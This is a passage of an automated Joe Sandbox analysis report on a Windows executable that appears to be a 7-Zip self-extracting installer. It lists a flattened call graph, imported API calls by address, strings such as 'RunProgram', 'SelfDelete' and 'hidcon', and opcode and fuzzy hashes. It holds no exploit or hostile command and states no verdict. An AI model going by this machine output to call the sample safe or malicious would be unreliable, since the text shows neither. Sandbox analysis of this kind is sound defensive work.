9885->9886 9887 404c4b 9886->9887 9888 404c8c 9886->9888 9887->9888 9889 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9887->9889 9890 402c86 16 API calls 9888->9890 9889->9862 9891 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9890->9891 9891->9857 9901 4022b0 9892->9901 9896 401411 2 API calls 9895->9896 9897 40273a 9896->9897 9898 402772 9897->9898 9899 402535 2 API calls 9897->9899 9898->9453 9900 402757 MultiByteToWideChar 9899->9900 9900->9898 9902 4022ea 9901->9902 9903 4022be ??2@YAPAXI 9901->9903 9902->9453 9903->9902 9904 4022cf ??3@YAXPAX 9903->9904 9904->9902 9907 401ae3 9906->9907 9910 401a97 9906->9910 9907->9460 9908 401abc CharUpperW CharUpperW 9909 401af3 CharUpperW CharUpperW 9908->9909 9908->9910 9909->9907 9910->9907 9910->9908 9911->9479 9913 403e9e 9912->9913 9914 4022b0 2 API calls 9913->9914 9915 403eac 9914->9915 9915->9493 9917 40435e 
9916->9917 9918 404375 9917->9918 9919 40436a 9917->9919 9920 4025ae 2 API calls 9918->9920 9936 4025f6 9919->9936 9921 40437e 9920->9921 9923 4022b0 2 API calls 9921->9923 9925 404387 9923->9925 9924 404373 9928 403ec1 9924->9928 9926 4025f6 2 API calls 9925->9926 9927 4043b5 ??3@YAXPAX 9926->9927 9927->9924 9929 403ecd 9928->9929 9931 403ede 9928->9931 9930 4022b0 2 API calls 9929->9930 9930->9931 9931->9499 9933 403f06 9932->9933 9939 4022fc 9933->9939 9935 403f13 9935->9505 9937 4022b0 2 API calls 9936->9937 9938 402610 9937->9938 9938->9924 9940 402340 9939->9940 9941 402310 9939->9941 9940->9935 9942 4022b0 2 API calls 9941->9942 9942->9940 9944 4022fc 2 API calls 9943->9944 9945 40264a 9944->9945 9945->9515 9947 4025ae 2 API calls 9946->9947 9948 402992 9947->9948 9949 4029be 9948->9949 9950 402640 2 API calls 9948->9950 9949->9536 9950->9948 9954 4023e8 9951->9954 9952 4023f4 lstrcmpW 9953 402411 9952->9953 9952->9954 9953->9536 9954->9952 9954->9953 9955->9536 9957 4029d2 9956->9957 9958 4029de 9956->9958 9975 4019f0 GetStdHandle WriteFile 9957->9975 9960 4025ae 2 API calls 9958->9960 9964 4029e8 9960->9964 9961 4029d9 9973 402425 ??3@YAXPAX ??3@YAXPAX 9961->9973 9962 402a13 9963 40272e 3 API calls 9962->9963 9965 402a25 9963->9965 9964->9962 9968 402640 2 API calls 9964->9968 9966 402a33 9965->9966 9967 402a47 9965->9967 9969 407776 55 API calls 9966->9969 9970 407776 55 API calls 9967->9970 9968->9964 9971 402a42 ??3@YAXPAX ??3@YAXPAX 9969->9971 9970->9971 9971->9961 9973->9533 9974->9522 9975->9961 9977 403d3d 9976->9977 9988 403c63 9977->9988 9981 403cd3 9980->9981 9982 403c63 _wtol 9981->9982 9983 403cf4 9982->9983 9983->9588 9985 403d04 9984->9985 9986 403c63 _wtol 9985->9986 9987 403d1c 9986->9987 9987->9593 9989 403c6d 9988->9989 9990 403c88 _wtol 9989->9990 9991 403cc1 9989->9991 9990->9989 9991->9582 9993 408679 9992->9993 9993->9630 9995 40a7fe 9994->9995 9996 40b2fc 11 API calls 9995->9996 9997 40a823 9996->9997 9998 40a845 9997->9998 9999 
                                                                APIs
                                                                  • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                  • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                  • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                  • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                  • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                                  • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                  • Part of subcall function 00401B37: DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                                                • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                                  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                                                • _wtol.MSVCRT ref: 0040509F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                                                • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                                                • _wtol.MSVCRT ref: 00405217
                                                                • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                                  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                  • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                                  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                  • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                                  • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                                  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                                  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                                  • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                                • wsprintfW.USER32 ref: 00405595
                                                                • _wtol.MSVCRT ref: 004057DE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                                • CoInitialize.OLE32(00000000), ref: 004059E9
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                                • GetKeyState.USER32(00000010), ref: 00405AA1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                • memset.MSVCRT ref: 004060AE
                                                                • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                • _wtol.MSVCRT ref: 00405F65
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerWindowlstrcpymemcmpwsprintf$AttributesCloseCommandCreateCurrentDestroyDirectoryDispatchErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateVersionWait_wcsnicmpmemmovememsetwvsprintf
                                                                • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                • API String ID: 3696187633-3058303289
                                                                • Opcode ID: 819a16367885825f4e344e77836869b1f6d7740230357e2b02187f71ec59b593
                                                                • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                • Opcode Fuzzy Hash: 819a16367885825f4e344e77836869b1f6d7740230357e2b02187f71ec59b593
                                                                • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                                                Control-flow Graph

                                                                Control-flow graph for the function at 0x40301a (graph image not recoverable from the page; executed/not-executed colouring and block listing omitted). API calls referenced by its basic blocks: GetFileAttributesW, SetLastError, FindFirstFileW, FindClose, CompareFileTime.
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                                • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AttributesErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1799206407-0
                                                                • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                                • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                                APIs
                                                                • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                                • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: DiskFreeMessageSendSpace
                                                                • String ID:
                                                                • API String ID: 696007252-0
                                                                • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                                • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                                                                Control-flow Graph

                                                                Control-flow graph for the function at 0x411def (graph image not recoverable from the page; executed/not-executed colouring and block listing omitted). API calls referenced by its basic blocks: __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __getmainargs, GetStartupInfoA, GetModuleHandleA, exit, _XcptFilter.
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                • String ID: HpA
                                                                • API String ID: 801014965-2938899866
                                                                • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                                • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                • DispatchMessageW.USER32(?), ref: 00401B89
                                                                • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                • DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
